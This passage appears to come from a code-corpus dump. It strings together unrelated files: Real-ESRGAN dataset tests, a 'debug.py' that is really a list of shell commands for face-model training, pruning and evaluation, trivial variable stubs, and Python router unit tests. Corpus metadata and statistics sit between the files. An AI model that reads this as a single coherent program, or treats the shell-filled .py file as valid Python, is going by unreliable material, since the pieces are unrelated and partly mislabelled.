expected_keys = ['gt', 'kernel1', 'kernel2', 'sinc_kernel', 'gt_path']
assert set(expected_keys).issubset(set(result.keys()))
# check shape and contents
assert result['gt'].shape == (3, 400, 400)
assert result['kernel1'].shape == (21, 21)
assert result['kernel2'].shape == (21, 21)
assert result['sinc_kernel'].shape == (21, 21)
assert result['gt_path'] == 'tests/data/gt/baboon.png'
# ------------------ test lmdb backend -------------------- #
opt['dataroot_gt'] = 'tests/data/gt.lmdb'
opt['io_backend']['type'] = 'lmdb'
dataset = RealESRGANDataset(opt)
assert dataset.io_backend_opt['type'] == 'lmdb' # io backend
assert len(dataset.paths) == 2 # whether to read correct meta info
assert dataset.kernel_list == [
'iso', 'aniso', 'generalized_iso', 'generalized_aniso', 'plateau_iso', 'plateau_aniso'
] # correct initialization the degradation configurations
assert dataset.betag_range2 == [0.5, 4]
# test __getitem__
result = dataset.__getitem__(1)
# check returned keys
expected_keys = ['gt', 'kernel1', 'kernel2', 'sinc_kernel', 'gt_path']
assert set(expected_keys).issubset(set(result.keys()))
# check shape and contents
assert result['gt'].shape == (3, 400, 400)
assert result['kernel1'].shape == (21, 21)
assert result['kernel2'].shape == (21, 21)
assert result['sinc_kernel'].shape == (21, 21)
assert result['gt_path'] == 'comic'
# ------------------ test with sinc_prob = 0 -------------------- #
opt['dataroot_gt'] = 'tests/data/gt.lmdb'
opt['io_backend']['type'] = 'lmdb'
opt['sinc_prob'] = 0
opt['sinc_prob2'] = 0
opt['final_sinc_prob'] = 0
dataset = RealESRGANDataset(opt)
result = dataset.__getitem__(0)
# check returned keys
expected_keys = ['gt', 'kernel1', 'kernel2', 'sinc_kernel', 'gt_path']
assert set(expected_keys).issubset(set(result.keys()))
# check shape and contents
assert result['gt'].shape == (3, 400, 400)
assert result['kernel1'].shape == (21, 21)
assert result['kernel2'].shape == (21, 21)
assert result['sinc_kernel'].shape == (21, 21)
assert result['gt_path'] == 'baboon'
# ------------------ lmdb backend should have paths ends with lmdb -------------------- #
with pytest.raises(ValueError):
opt['dataroot_gt'] = 'tests/data/gt'
opt['io_backend']['type'] = 'lmdb'
dataset = RealESRGANDataset(opt)
def test_realesrgan_paired_dataset():
with open('tests/data/test_realesrgan_paired_dataset.yml', mode='r') as f:
opt = yaml.load(f, Loader=yaml.FullLoader)
dataset = RealESRGANPairedDataset(opt)
assert dataset.io_backend_opt['type'] == 'disk' # io backend
assert len(dataset) == 2 # whether to read correct meta info
# test __getitem__
result = dataset.__getitem__(0)
# check returned keys
expected_keys = ['gt', 'lq', 'gt_path', 'lq_path']
assert set(expected_keys).issubset(set(result.keys()))
# check shape and contents
assert result['gt'].shape == (3, 128, 128)
assert result['lq'].shape == (3, 32, 32)
assert result['gt_path'] == 'tests/data/gt/baboon.png'
assert result['lq_path'] == 'tests/data/lq/baboon.png'
# ------------------ test lmdb backend -------------------- #
opt['dataroot_gt'] = 'tests/data/gt.lmdb'
opt['dataroot_lq'] = 'tests/data/lq.lmdb'
opt['io_backend']['type'] = 'lmdb'
dataset = RealESRGANPairedDataset(opt)
assert dataset.io_backend_opt['type'] == 'lmdb' # io backend
assert len(dataset) == 2 # whether to read correct meta info
# test __getitem__
result = dataset.__getitem__(1)
# check returned keys
expected_keys = ['gt', 'lq', 'gt_path', 'lq_path']
assert set(expected_keys).issubset(set(result.keys()))
# check shape and contents
assert result['gt'].shape == (3, 128, 128)
assert result['lq'].shape == (3, 32, 32)
assert result['gt_path'] == 'comic'
assert result['lq_path'] == 'comic'
# ------------------ test paired_paths_from_folder -------------------- #
opt['dataroot_gt'] = 'tests/data/gt'
opt['dataroot_lq'] = 'tests/data/lq'
opt['io_backend'] = dict(type='disk')
opt['meta_info'] = None
dataset = RealESRGANPairedDataset(opt)
assert dataset.io_backend_opt['type'] == 'disk' # io backend
assert len(dataset) == 2 # whether to read correct meta info
# test __getitem__
result = dataset.__getitem__(0)
# check returned keys
expected_keys = ['gt', 'lq', 'gt_path', 'lq_path']
assert set(expected_keys).issubset(set(result.keys()))
# check shape and contents
assert result['gt'].shape == (3, 128, 128)
assert result['lq'].shape == (3, 32, 32)
# ------------------ test normalization -------------------- #
dataset.mean = [0.5, 0.5, 0.5]
dataset.std = [0.5, 0.5, 0.5]
# test __getitem__
result = dataset.__getitem__(0)
# check returned keys
expected_keys = ['gt', 'lq', 'gt_path', 'lq_path']
assert set(expected_keys).issubset(set(result.keys()))
# check shape and contents
assert result['gt'].shape == (3, 128, 128)
assert result['lq'].shape == (3, 32, 32)
| 39.717105
| 94
| 0.625642
| 756
| 6,037
| 4.80291
| 0.125661
| 0.089232
| 0.046268
| 0.03718
| 0.859267
| 0.856513
| 0.841641
| 0.800055
| 0.787111
| 0.75902
| 0
| 0.031493
| 0.189995
| 6,037
| 151
| 95
| 39.980132
| 0.711043
| 0.190492
| 0
| 0.764706
| 0
| 0
| 0.203015
| 0.032012
| 0
| 0
| 0
| 0
| 0.470588
| 1
| 0.019608
| false
| 0
| 0.039216
| 0
| 0.058824
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7161e65dbae03899950e09cae96b95481cf8bd16
| 11,448
|
py
|
Python
|
src/debug.py
|
ivclab/PackExpander
|
81b8e832018f60fc678883f3025c39cb1d289e27
|
[
"MIT"
] | 25
|
2019-03-28T09:02:44.000Z
|
2022-02-11T15:30:50.000Z
|
src/debug.py
|
ivclab/PackExpander
|
81b8e832018f60fc678883f3025c39cb1d289e27
|
[
"MIT"
] | 2
|
2020-10-29T06:16:16.000Z
|
2021-01-04T02:23:04.000Z
|
src/debug.py
|
ivclab/PackExpander
|
81b8e832018f60fc678883f3025c39cb1d289e27
|
[
"MIT"
] | 7
|
2020-03-26T05:39:30.000Z
|
2021-07-30T09:12:42.000Z
|
# Preprocessing dataset
CUDA_VISIBLE_DEVICES=3 python src/align/align_dataset_mtcnn.py \
~/fevemania/datasets/age_gender/others/test_fold_is_4/train/age \
~/fevemania/datasets/age/test_fold_is_4/train \
--image_size 182 \
--margin 44
CUDA_VISIBLE_DEVICES=3 python src/align/align_dataset_mtcnn.py \
~/fevemania/datasets/age_gender/others/test_fold_is_4/train/gender \
~/fevemania/datasets/gender/test_fold_is_4/train \
--image_size 182 \
--margin 44
CUDA_VISIBLE_DEVICES=2 python src/align/align_dataset_mtcnn.py \
~/fevemania/datasets/age_gender/others/test_fold_is_4/validation/age \
~/fevemania/datasets/age/test_fold_is_4/val \
--image_size 182 \
--margin 44
CUDA_VISIBLE_DEVICES=3 python src/align/align_dataset_mtcnn.py \
~/fevemania/datasets/age_gender/others/test_fold_is_4/validation/gender \
~/fevemania/datasets/gender/test_fold_is_4/val \
--image_size 182 \
--margin 44
CUDA_VISIBLE_DEVICES=3 python src/validation.py \
--data_dir '~/fevemania/datasets/facenet' \
--model 'official_checkpoint/emotion/1/copied' \
--use_fixed_image_standardization \
--task_name emotion \
--task_id 2 \
--eval_once \
--print_mem \
--print_mask_info \
# step1 : Transfer official checkpoint into the one that has our self-defined variables
# ie. masks and their thresholds, and change weights' names in checkpoint file (from '' to 'task_1')
#
# In the meanwhile, add hole for task_1
CUDA_VISIBLE_DEVICES=0 python src/train_softmax.py \
--logs_base_dir logs/facenet/5 \
--models_base_dir official_checkpoint/facenet/5 \
--data_dir /home/ivclab/fevemania/datasets/vggface2 \
--image_size 160 \
--model_def models.inception_resnet_v1 \
--lfw_dir ~/datasets/lfw_mtcnnpy_160/ \
--optimizer ADAM \
--learning_rate 0.0005 \
--nrof_addiitonal_epochs_to_run 150 \
--keep_probability 0.4 \
--random_crop \
--random_flip \
--use_fixed_image_standardization \
--weight_decay 5e-4 \
--embedding_size 512 \
--lfw_distance_metric 1 \
--lfw_use_flipped_images \
--lfw_subtract_mean \
--validation_set_split_ratio 0.05 \
--validate_every_n_epochs 5 \
--prelogits_norm_loss_factor 5e-4 \
--gpu_memory_fraction 0.8 \
--change_weight_name_from_github official_checkpoint/model-20180402-114759.ckpt-275 \
--open_ratio 1.0 \
--task_id 1 \
# step2 : use csv file to record the initial accuracy and its pruned status (pruned_ratio = 0.0)
CUDA_VISIBLE_DEVICES=1 python src/validate_on_lfw.py \
--lfw_dir ~/fevemania/datasets/lfw_mtcnnpy_160 \
--lfw_pairs data/pairs.txt \
--distance_metric 1 \
--use_flipped_images \
--subtract_mean \
--use_fixed_image_standardization \
--task_id 1 \
--model official_checkpoint/facenet/5/model-.ckpt-0 \
--eval_once \
# --print_mem \
# --print_mask_info \
# --verbose \
# --csv_file_path csv/facenet.csv \
# step3 : gradually pruning (each time prung 10%)
CUDA_VISIBLE_DEVICES=0 python src/train_softmax.py \
--logs_base_dir logs/facenet \
--models_base_dir official_checkpoint/facenet \
--data_dir /home/ivclab/fevemania/datasets/vggface2/train_182 \
--image_size 160 \
--model_def models.inception_resnet_v1 \
--lfw_dir ~/datasets/lfw_mtcnnpy_160/ \
--optimizer ADAM \
--learning_rate 0.0005 \
--nrof_addiitonal_epochs_to_run 4 \
--keep_probability 0.8 \
--random_crop \
--random_flip \
--use_fixed_image_standardization \
--weight_decay 5e-4 \
--embedding_size 512 \
--lfw_distance_metric 1 \
--lfw_use_flipped_images \
--lfw_subtract_mean \
--validation_set_split_ratio 0.05 \
--validate_every_n_epochs 1000 \
--prelogits_norm_loss_factor 5e-4 \
--gpu_memory_fraction 0.8 \
--use_pruning_strategy \
--begin_pruning_epoch 0 \
--end_pruning_epoch 1.0 \
--pruning_hparams name=pruning,initial_sparsity=0.0,target_sparsity=0.1,pruning_frequency=10 \
# Step 4. second task (age) -> open new hole
CUDA_VISIBLE_DEVICES=2 python src/train_softmax.py \
--logs_base_dir logs/age \
--models_base_dir official_checkpoint/age \
--data_dir /home/ivclab/fevemania/datasets/age_gender \
--image_size 160 \
--model_def models.inception_resnet_v1 \
--optimizer ADAM \
--learning_rate 0.01 \
--nrof_addiitonal_epochs_to_run 150 \
--keep_probability 0.8 \
--random_crop \
--random_flip \
--use_fixed_image_standardization \
--weight_decay 5e-4 \
--embedding_size 512 \
--validate_every_n_epochs 1 \
--gpu_memory_fraction 0.8 \
--pretrained_model official_checkpoint/facenet/model-.ckpt-8 \
--task_name age \
--task_id 2 \
--open_ratio 1.0 \
# Step 5. check if the past task is forgot by the network
CUDA_VISIBLE_DEVICES=3 python src/validate_on_lfw.py \
--lfw_dir ~/fevemania/datasets/lfw_mtcnnpy_160 \
--model official_checkpoint/age/model-.ckpt-52 \
--lfw_pairs data/pairs.txt \
--distance_metric 1 \
--use_flipped_images \
--subtract_mean \
--use_fixed_image_standardization \
--task_id 1 \
--lfw_batch_size 300 \
--eval_once \
--print_mem \
--print_mask_info \
# Step 6. start training age (task2)
CUDA_VISIBLE_DEVICES=2 python src/train_softmax.py \
--logs_base_dir logs/age \
--models_base_dir official_checkpoint/age \
--data_dir /home/ivclab/fevemania/datasets/age_gender \
--image_size 160 \
--model_def models.inception_resnet_v1 \
--optimizer ADAM \
--learning_rate 0.001 \
--nrof_addiitonal_epochs_to_run 60 \
--keep_probability 0.8 \
--random_crop \
--random_flip \
--use_fixed_image_standardization \
--weight_decay 5e-4 \
--embedding_size 512 \
--validate_every_n_epochs 1 \
--gpu_memory_fraction 0.8 \
--task_name age \
--task_id 2 \
--max_to_keep 10
# Step 7. evaluate task2
CUDA_VISIBLE_DEVICES=1 python src/validation.py \
--data_dir ~/fevemania/datasets/age_gender \
--model official_checkpoint/age/model-.ckpt-85 \
--use_fixed_image_standardization \
--task_id 2 \
--print_mem \
--print_mask_info \
--verbose \
--csv_file_path csv/age.csv \
--eval_once \
# Step 8. pruning task2
CUDA_VISIBLE_DEVICES=0 python src/train_softmax.py \
--logs_base_dir logs/age \
--models_base_dir official_checkpoint/age \
--data_dir /home/ivclab/fevemania/datasets/age_gender \
--image_size 160 \
--model_def models.inception_resnet_v1 \
--optimizer ADAM \
--learning_rate 0.0005 \
--nrof_addiitonal_epochs_to_run 85 \
--keep_probability 0.8 \
--random_crop \
--random_flip \
--use_fixed_image_standardization \
--weight_decay 5e-4 \
--embedding_size 512 \
--validate_every_n_epochs 1 \
--gpu_memory_fraction 0.8 \
--task_name age \
--task_id 2 \
--max_to_keep 10 \
--use_pruning_strategy \
--begin_pruning_epoch 0 \
--end_pruning_epoch 1.0 \
--pruning_hparams name=pruning,initial_sparsity=0.8,target_sparsity=0.85,pruning_frequency=10 \
# Step 9. open hole for task3
CUDA_VISIBLE_DEVICES=0 python src/train_softmax.py \
--logs_base_dir logs/gender \
--models_base_dir official_checkpoint/gender \
--data_dir /home/ivclab/fevemania/datasets/age_gender \
--image_size 160 \
--model_def models.inception_resnet_v1 \
--optimizer ADAM \
--learning_rate 0.01 \
--nrof_addiitonal_epochs_to_run 150 \
--keep_probability 0.8 \
--random_crop \
--random_flip \
--use_fixed_image_standardization \
--weight_decay 5e-4 \
--embedding_size 512 \
--validate_every_n_epochs 1 \
--gpu_memory_fraction 0.8 \
--pretrained_model official_checkpoint/age/model-.ckpt-72 \
--task_name gender \
--task_id 3 \
--set_zeros_in_masks_to_current_task_id \
--open_ratio 1.0 \
# Step 10. check if the past task is forgot by the network
CUDA_VISIBLE_DEVICES=3 python src/validate_on_lfw.py \
--lfw_dir ~/fevemania/datasets/lfw_mtcnnpy_160 \
--model official_checkpoint/gender/model-.ckpt-0 \
--lfw_pairs data/pairs.txt \
--distance_metric 1 \
--use_flipped_images \
--subtract_mean \
--use_fixed_image_standardization \
--task_id 1 \
--lfw_batch_size 300 \
--eval_once \
--print_mem \
--print_mask_info \
CUDA_VISIBLE_DEVICES=2 python src/validation.py \
--data_dir ~/fevemania/datasets/age_gender \
--model official_checkpoint/gender/model-.ckpt-15 \
--use_fixed_image_standardization \
--task_id 2 \
--task_name age \
--eval_once \
--print_mem \
--print_mask_info \
CUDA_VISIBLE_DEVICES=1 python src/validation.py \
--data_dir ~/fevemania/datasets/age_gender/others/test_fold_is_4 \
--model official_checkpoint/gender/copied/model-.ckpt-15 \
--use_fixed_image_standardization \
--task_id 2 \
--task_name age \
--eval_once \
--print_mem \
--print_mask_info \
# Step 11. start training gender (task3)
CUDA_VISIBLE_DEVICES=0 python src/train_softmax.py \
--logs_base_dir logs/gender \
--models_base_dir official_checkpoint/gender \
--data_dir /home/ivclab/fevemania/datasets/age_gender \
--image_size 160 \
--model_def models.inception_resnet_v1 \
--optimizer ADAM \
--learning_rate 0.0005 \
--nrof_addiitonal_epochs_to_run 35 \
--keep_probability 0.8 \
--random_crop \
--random_flip \
--use_fixed_image_standardization \
--weight_decay 5e-4 \
--embedding_size 512 \
--validate_every_n_epochs 1 \
--gpu_memory_fraction 0.8 \
--task_name gender \
--task_id 3 \
--max_to_keep 5
# Stepp 12. evaluate task 3
CUDA_VISIBLE_DEVICES=2 python src/validation.py \
--data_dir ~/fevemania/datasets/age_gender \
--model official_checkpoint/gender/model-.ckpt-28 \
--use_fixed_image_standardization \
--task_id 3 \
--eval_once \
--task_name gender \
--print_mem \
--print_mask_info \
--csv_file_path csv/gender.csv \
CUDA_VISIBLE_DEVICES=3 python src/validate_on_lfw.py \
--lfw_dir ~/fevemania/datasets/lfw_mtcnnpy_160 \
--model official_checkpoint/careful_pruning_05 \
--lfw_pairs data/custom_pairs.txt \
--lfw_nrof_folds 2 \
--distance_metric 1 \
--subtract_mean \
--use_fixed_image_standardization \
--task_id 1 \
--lfw_batch_size 1 \
--eval_once \
# --use_flipped_images \
# CUDA_VISIBLE_DEVICES=1 python src/train_softmax.py \
# --logs_base_dir logs/facenet/ \
# --models_base_dir official_checkpoint \
# --data_dir ~/fevemania/datasets/CASIA-WebFacealignmtcnn112/ \
# --image_size 160 \
# --model_def models.inception_resnet_v1 \
# --lfw_dir ~/datasets/lfw/lfw_mtcnnalign_160/ \
# --optimizer ADAM \
# --learning_rate -1 \
# --nrof_addiitonal_epochs_to_run 150 \
# --keep_probability 0.8 \
# --random_crop \
# --random_flip \
# --use_fixed_image_standardization \
# --learning_rate_schedule_file data/learning_rate_schedule_classifier_casia.txt \
# --weight_decay 5e-4 \
# --embedding_size 512 \
# --lfw_distance_metric 1 \
# --lfw_use_flipped_images \
# --lfw_subtract_mean \
# --validation_set_split_ratio 0.05 \
# --validate_every_n_epochs 5 \
# --prelogits_norm_loss_factor 5e-4
tf.get_default_graph().get_tensor_by_name("task_1/Logits/BiasAdd:0")
python src/validate_on_lfw.py \
~/datasets/lfw_mtcnnpy_160 \
original \
--distance_metric 1 \
--use_flipped_images \
--subtract_mean \
--use_fixed_image_standardization
CUDA_VISIBLE_DEVICES=1 python src/validate_on_lfw.py \
--lfw_dir ~/fevemania/datasets/lfw_mtcnnpy_160 \
--lfw_pairs data/pairs.txt \
--distance_metric 1 \
--use_flipped_images \
--subtract_mean \
--use_fixed_image_standardization \
--task_id 1 \
--model official_checkpoint/experiment1/gender/test_fold_is_4/model-.ckpt-26 \
--print_mem \
--eval_once \
CUDA_VISIBLE_DEVICES=2 python src/validation.py \
--data_dir '/home/ivclab/fevemania/datasets/age/test_fold_is_4' \
--use_fixed_image_standardization \
--task_name age \
--task_id 2 \
--model official_checkpoint/experiment1/gender/test_fold_is_4/model-.ckpt-26 \
--print_mem \
--eval_once \
CUDA_VISIBLE_DEVICES=3 python src/validation.py \
--data_dir '/home/ivclab/fevemania/datasets/gender/test_fold_is_4' \
--use_fixed_image_standardization \
--task_name gender \
--task_id 3 \
--model official_checkpoint/experiment1/gender/test_fold_is_4/model-.ckpt-26 \
--print_mem \
--eval_once \
| 29.353846
| 100
| 0.77376
| 1,735
| 11,448
| 4.727378
| 0.127954
| 0.058035
| 0.05267
| 0.07169
| 0.85662
| 0.843331
| 0.810778
| 0.788344
| 0.772616
| 0.768227
| 0
| 0.039938
| 0.098882
| 11,448
| 390
| 101
| 29.353846
| 0.755138
| 0.138539
| 0
| 0.815534
| 0
| 0
| 0.019352
| 0.019352
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.055016
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
71723dd614682a121a712c7f69103fd8789aecbb
| 128
|
py
|
Python
|
python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_1/_pkg1_1_1/_pkg1_1_1_1/_pkg1_1_1_1_0/_mod1_1_1_1_0_2.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2018-12-29T09:53:39.000Z
|
2018-12-29T09:53:42.000Z
|
python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_1/_pkg1_1_1/_pkg1_1_1_1/_pkg1_1_1_1_0/_mod1_1_1_1_0_2.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_1/_pkg1_1_1/_pkg1_1_1_1/_pkg1_1_1_1_0/_mod1_1_1_1_0_2.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
name1_1_1_1_0_2_0 = None
name1_1_1_1_0_2_1 = None
name1_1_1_1_0_2_2 = None
name1_1_1_1_0_2_3 = None
name1_1_1_1_0_2_4 = None
| 14.222222
| 24
| 0.820313
| 40
| 128
| 1.875
| 0.175
| 0.266667
| 0.466667
| 0.533333
| 0.88
| 0.88
| 0.746667
| 0
| 0
| 0
| 0
| 0.318182
| 0.140625
| 128
| 9
| 25
| 14.222222
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
e0807c613172e62bb48c624efcd006f15d3c2fa6
| 157
|
py
|
Python
|
hmtl/__init__.py
|
dasguptar/hmtl
|
fa41074f2fb8e39023166ce25e54064ecb4f0179
|
[
"MIT"
] | null | null | null |
hmtl/__init__.py
|
dasguptar/hmtl
|
fa41074f2fb8e39023166ce25e54064ecb4f0179
|
[
"MIT"
] | null | null | null |
hmtl/__init__.py
|
dasguptar/hmtl
|
fa41074f2fb8e39023166ce25e54064ecb4f0179
|
[
"MIT"
] | null | null | null |
# coding: utf-8
from hmtl.dataset_readers import *
from hmtl.modules import *
from hmtl.models import *
from hmtl.tasks import *
from hmtl.training import *
| 22.428571
| 34
| 0.770701
| 24
| 157
| 5
| 0.5
| 0.333333
| 0.466667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007463
| 0.146497
| 157
| 7
| 35
| 22.428571
| 0.88806
| 0.082803
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e0a7c1a223cdbc8d81d9807dc0c32b046c5145b2
| 6,992
|
py
|
Python
|
testing/router_test.py
|
Stuart-Wilcox/servepy
|
df315cfb265489785bb34183c7d69ca9aa21d74d
|
[
"MIT"
] | 3
|
2020-02-04T10:33:45.000Z
|
2020-02-04T10:34:27.000Z
|
testing/router_test.py
|
Stuart-Wilcox/servepy
|
df315cfb265489785bb34183c7d69ca9aa21d74d
|
[
"MIT"
] | 9
|
2018-04-09T14:45:20.000Z
|
2018-04-16T04:15:31.000Z
|
testing/router_test.py
|
Stuart-Wilcox/servepy
|
df315cfb265489785bb34183c7d69ca9aa21d74d
|
[
"MIT"
] | null | null | null |
import unittest
from src.serve import Router
print('\n***ROUTER TEST***\n')
def middleware_1(req, res, next):
pass
def middleware_2(req, res, next):
next()
def endware_1(req, res):
pass
def endware_2(req, res):
pass
class TestRouter(unittest.TestCase):
def test_init(self):
router = Router()
self.assertIsNotNone(router)
def test_all(self):
router = Router()
router.all('/', endware_1)
router.all('/', endware_2)
self.assertIsNotNone(router._endware_path_match('/', 'GET'))
self.assertIsNotNone(router._endware_path_match('/', 'PUT'))
self.assertIsNotNone(router._endware_path_match('/', 'POST'))
self.assertIsNotNone(router._endware_path_match('/', 'DELETE'))
self.assertIsNone(router._endware_path_match('/abc', 'GET'))
self.assertEqual(router._endware_path_match('/', 'GET')[2], endware_1) # endware_1 matches method in tuple in endware
def test_get(self):
router = Router()
router.get('/', endware_1)
router.get('/abc', endware_2)
router.get('/abc/:val', endware_1)
self.assertIsNotNone(router._endware_path_match('/', 'GET'))
self.assertIsNone(router._endware_path_match('/', 'PUT'))
self.assertIsNone(router._endware_path_match('/', 'POST'))
self.assertIsNone(router._endware_path_match('/', 'DELETE'))
self.assertIsNotNone(router._endware_path_match('/abc', 'GET'))
self.assertIsNotNone(router._endware_path_match('/abc/123', 'GET'))
self.assertEqual(router._endware_path_match('/', 'GET')[2], endware_1)
self.assertEqual(router._endware_path_match('/abc', 'GET')[2], endware_2)
self.assertEqual(router._endware_path_match('/abc/123', 'GET')[2], endware_1)
self.assertEqual(router._endware_path_match('/abc/123', 'GET')[0].params['val'], '123')
self.assertEqual(router._endware_path_match('/abc/123?val=123', 'GET')[0].query['val'], '123')
def test_post(self):
router = Router()
router.post('/', endware_1)
router.post('/abc', endware_2)
router.post('/abc/:val', endware_1)
self.assertIsNotNone(router._endware_path_match('/', 'POST'))
self.assertIsNone(router._endware_path_match('/', 'PUT'))
self.assertIsNone(router._endware_path_match('/', 'GET'))
self.assertIsNone(router._endware_path_match('/', 'DELETE'))
self.assertIsNotNone(router._endware_path_match('/abc', 'POST'))
self.assertIsNotNone(router._endware_path_match('/abc/123', 'POST'))
self.assertEqual(router._endware_path_match('/', 'POST')[2], endware_1)
self.assertEqual(router._endware_path_match('/abc', 'POST')[2], endware_2)
self.assertEqual(router._endware_path_match('/abc/123', 'POST')[2], endware_1)
self.assertEqual(router._endware_path_match('/abc/123', 'POST')[0].params['val'], '123')
self.assertEqual(router._endware_path_match('/abc/123?val=123', 'POST')[0].query['val'], '123')
def test_put(self):
router = Router()
router.put('/', endware_1)
router.put('/abc', endware_2)
router.put('/abc/:val', endware_1)
self.assertIsNotNone(router._endware_path_match('/', 'PUT'))
self.assertIsNone(router._endware_path_match('/', 'POST'))
self.assertIsNone(router._endware_path_match('/', 'GET'))
self.assertIsNone(router._endware_path_match('/', 'DELETE'))
self.assertIsNotNone(router._endware_path_match('/abc', 'PUT'))
self.assertIsNotNone(router._endware_path_match('/abc/123', 'PUT'))
self.assertEqual(router._endware_path_match('/', 'PUT')[2], endware_1)
self.assertEqual(router._endware_path_match('/abc', 'PUT')[2], endware_2)
self.assertEqual(router._endware_path_match('/abc/123', 'PUT')[2], endware_1)
self.assertEqual(router._endware_path_match('/abc/123', 'PUT')[0].params['val'], '123')
self.assertEqual(router._endware_path_match('/abc/123?val=123', 'PUT')[0].query['val'], '123')
def test_delete(self):
router = Router()
router.delete('/', endware_1)
router.delete('/abc', endware_2)
router.delete('/abc/:val', endware_1)
self.assertIsNotNone(router._endware_path_match('/', 'DELETE'))
self.assertIsNone(router._endware_path_match('/', 'POST'))
self.assertIsNone(router._endware_path_match('/', 'GET'))
self.assertIsNone(router._endware_path_match('/', 'PUT'))
self.assertIsNotNone(router._endware_path_match('/abc', 'DELETE'))
self.assertIsNotNone(router._endware_path_match('/abc/123', 'DELETE'))
self.assertEqual(router._endware_path_match('/', 'DELETE')[2], endware_1)
self.assertEqual(router._endware_path_match('/abc', 'DELETE')[2], endware_2)
self.assertEqual(router._endware_path_match('/abc/123', 'DELETE')[2], endware_1)
self.assertEqual(router._endware_path_match('/abc/123', 'DELETE')[0].params['val'], '123')
self.assertEqual(router._endware_path_match('/abc/123?val=123', 'DELETE')[0].query['val'], '123')
def test_route(self):
router = Router()
router.route('/abc') \
.get('/', endware_1) \
.get('/:val', endware_2)
self.assertIsNotNone(router._endware_path_match('/abc', 'GET'))
self.assertIsNone(router._endware_path_match('/abc', 'PUT'))
self.assertIsNone(router._endware_path_match('/abc', 'POST'))
self.assertIsNone(router._endware_path_match('/abc', 'DELETE'))
self.assertIsNotNone(router._endware_path_match('/abc/123', 'GET'))
self.assertEqual(router._endware_path_match('/abc', 'GET')[2], endware_1)
self.assertEqual(router._endware_path_match('/abc/123', 'GET')[2], endware_2)
self.assertEqual(router._endware_path_match('/abc/123', 'GET')[0].params['val'], '123')
self.assertEqual(router._endware_path_match('/abc/123?val=123', 'GET')[0].query['val'], '123')
def test_use(self):
router = Router()
router.use('/abc', middleware_1)
router.use('/abc/123', middleware_2)
self.assertIsNotNone(router._middleware_path_match('/abc'))
self.assertIsNotNone(router._middleware_path_match('/abc/123'))
self.assertIsNotNone(router._middleware_path_match('/abc/123/def'))
self.assertEqual(len(router._middleware_path_match('/abc')), 1)
self.assertEqual(len(router._middleware_path_match('/abc/123')), 2)
self.assertEqual(len(router._middleware_path_match('/abc/123/def')), 2)
self.assertEqual(router._middleware_path_match('/abc')[0][1], middleware_1)
self.assertEqual(router._middleware_path_match('/abc/123')[0][1], middleware_1)
self.assertEqual(router._middleware_path_match('/abc/123')[1][1], middleware_2)
self.assertEqual(router._middleware_path_match('/abc?val=123')[0][0].query['val'], '123')
unittest.main()
| 42.634146
| 125
| 0.656608
| 857
| 6,992
| 5.058343
| 0.054842
| 0.143253
| 0.231373
| 0.299423
| 0.818685
| 0.818685
| 0.776932
| 0.736794
| 0.641292
| 0.60323
| 0
| 0.035751
| 0.163902
| 6,992
| 163
| 126
| 42.895706
| 0.705782
| 0.006293
| 0
| 0.347458
| 0
| 0
| 0.108984
| 0
| 0
| 0
| 0
| 0
| 0.59322
| 1
| 0.101695
| false
| 0.025424
| 0.016949
| 0
| 0.127119
| 0.008475
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e0cee71c71e40ad8df18ebe0fe574d810da392b4
| 4,579
|
py
|
Python
|
tests/analysis/test_differential_selection.py
|
tbj128/gene-expression-analyzer
|
a6c69577266f38b8978dfee513a67b929ad88d18
|
[
"MIT"
] | null | null | null |
tests/analysis/test_differential_selection.py
|
tbj128/gene-expression-analyzer
|
a6c69577266f38b8978dfee513a67b929ad88d18
|
[
"MIT"
] | null | null | null |
tests/analysis/test_differential_selection.py
|
tbj128/gene-expression-analyzer
|
